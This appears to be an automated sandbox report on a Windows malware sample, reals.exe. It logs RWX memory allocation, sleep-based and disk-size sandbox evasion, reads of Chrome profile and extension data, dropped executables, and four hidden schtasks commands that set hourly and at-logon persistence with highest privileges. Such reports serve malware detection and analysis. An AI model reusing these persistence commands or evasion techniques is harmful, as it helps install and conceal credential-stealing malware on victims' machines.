NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02df0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02860000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02860000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02860000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02860000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02860000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02860000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02860000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02860000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02860000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02860000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02860000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:52 a.m.	process_identifier: 1452 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000004750000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2108 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72a72000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2108 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02e30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x741e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x746c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74822000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75471000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x756c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76430000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x765d1000 process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

reals.exe tried to sleep 335 seconds, actually delayed analysis time by 335 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (13 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW Feb. 20, 2024, 7:51 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 20, 2024, 7:51 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 20, 2024, 7:51 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 20, 2024, 7:51 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 20, 2024, 7:51 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 20, 2024, 7:51 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 20, 2024, 7:51 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 20, 2024, 7:51 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 20, 2024, 7:51 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 20, 2024, 7:51 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 20, 2024, 7:51 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 20, 2024, 7:51 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 20, 2024, 7:51 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1

An application raised an exception which may be indicative of an exploit crash (8 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process chrome.exe with pid 3060 crashed
Application Crash	Process firefox.exe with pid 3952 crashed
Application Crash	Process firefox.exe with pid 2176 crashed
Application Crash	Process firefox.exe with pid 3212 crashed
__exception__ Feb. 20, 2024, 7:52 a.m.	stacktrace: 0x622e04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 c1 76 exception.instruction: call qword ptr [rip + 0x91f16] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x622e04 registers.r14: 186706560 registers.r15: 186707000 registers.rcx: 1356 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 112607312 registers.rsp: 186705736 registers.r11: 186710256 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1448 registers.r12: 33338640 registers.rbp: 186705872 registers.rdi: 33075888 registers.rax: 6434304 registers.r13: 186706432	1	0	0
__exception__ Feb. 20, 2024, 7:53 a.m.	stacktrace: 0xcd1f04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcd1f04 registers.r14: 8846192 registers.r15: 8845696 registers.rcx: 48 registers.rsi: 14750048 registers.r10: 0 registers.rbx: 0 registers.rsp: 8844744 registers.r11: 8846944 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 8796092887632 registers.r12: 8845527 registers.rbp: 8844864 registers.rdi: 100 registers.rax: 13442816 registers.r13: 2	1	0	0
__exception__ Feb. 20, 2024, 7:53 a.m.	stacktrace: 0xcd1f04 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcd1f04 registers.r14: 8580488 registers.r15: 8791491516016 registers.rcx: 48 registers.rsi: 8791491447680 registers.r10: 0 registers.rbx: 0 registers.rsp: 8580120 registers.r11: 8583504 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 8796092887632 registers.r12: 14908864 registers.rbp: 8580240 registers.rdi: 68263968 registers.rax: 13442816 registers.r13: 8581080	1	0	0
__exception__ Feb. 20, 2024, 7:53 a.m.	stacktrace: 0xcd1f04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcd1f04 registers.r14: 10550272 registers.r15: 10549776 registers.rcx: 48 registers.rsi: 14707488 registers.r10: 0 registers.rbx: 0 registers.rsp: 10548824 registers.r11: 10551024 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 8796092887632 registers.r12: 10549607 registers.rbp: 10548944 registers.rdi: 100 registers.rax: 13442816 registers.r13: 2	1	0	0

Steals private information from local Internet browsers (50 out of 2375 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-65D3EE5E-BF4.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Sync Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Sync Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Sync Extension Settings\flpiciilemghbmfalicajoolhkkenfel\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\fhilaheimglignddkjgofkcbgekhenbh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gojhcdgcpbpfigcaejpfhfegekdgiblk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Sync Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kkpllkodjeloidieedojogacfhpaihoh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Sync Extension Settings\kkpllkodjeloidieedojogacfhpaihoh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (6 events)

file	C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\89S7AqN8sq8AdM4Oot2T.exe
file	C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\f37pbXDbFY0Z2LnYvlpz.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk
file	C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\lAJtUcYyKh8w3igUMaur.exe
file	C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\qGDDcS3d5pQc8FHSfMi3.exe
file	C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\DOepsJkkm0E916Tb0AAa.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk

Creates a suspicious process (4 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST

Drops a binary and executes it (5 events)

file	C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\lAJtUcYyKh8w3igUMaur.exe
file	C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\f37pbXDbFY0Z2LnYvlpz.exe
file	C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\89S7AqN8sq8AdM4Oot2T.exe
file	C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\qGDDcS3d5pQc8FHSfMi3.exe
file	C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\DOepsJkkm0E916Tb0AAa.exe

Drops an executable to the user AppData folder (5 events)

file	C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\qGDDcS3d5pQc8FHSfMi3.exe
file	C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\DOepsJkkm0E916Tb0AAa.exe
file	C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\lAJtUcYyKh8w3igUMaur.exe
file	C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\f37pbXDbFY0Z2LnYvlpz.exe
file	C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\89S7AqN8sq8AdM4Oot2T.exe

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Feb. 20, 2024, 7:51 a.m.	thread_identifier: 2764 thread_handle: 0x000001a0 process_identifier: 2760 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000001a4	1	1
CreateProcessInternalW Feb. 20, 2024, 7:51 a.m.	thread_identifier: 2848 thread_handle: 0x000001ac process_identifier: 2844 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000001a8	1	1
CreateProcessInternalW Feb. 20, 2024, 7:51 a.m.	thread_identifier: 3020 thread_handle: 0x0000061c process_identifier: 3016 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000624	1	1
CreateProcessInternalW Feb. 20, 2024, 7:51 a.m.	thread_identifier: 1216 thread_handle: 0x00000628 process_identifier: 744 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000620	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (1 event)

Time & API	Arguments	Status	Return	Repeated
Process32NextW Feb. 20, 2024, 7:51 a.m.	snapshot_handle: 0x000004ec process_name: taskhost.exe process_identifier: 2348	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Feb. 20, 2024, 7:53 a.m.	process_identifier: 2176 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x0000006285770000 process_handle: 0xffffffffffffffff	1	0	0

An executable file was downloaded by the process reals.exe (5 events)

Time & API	Arguments	Status	Return
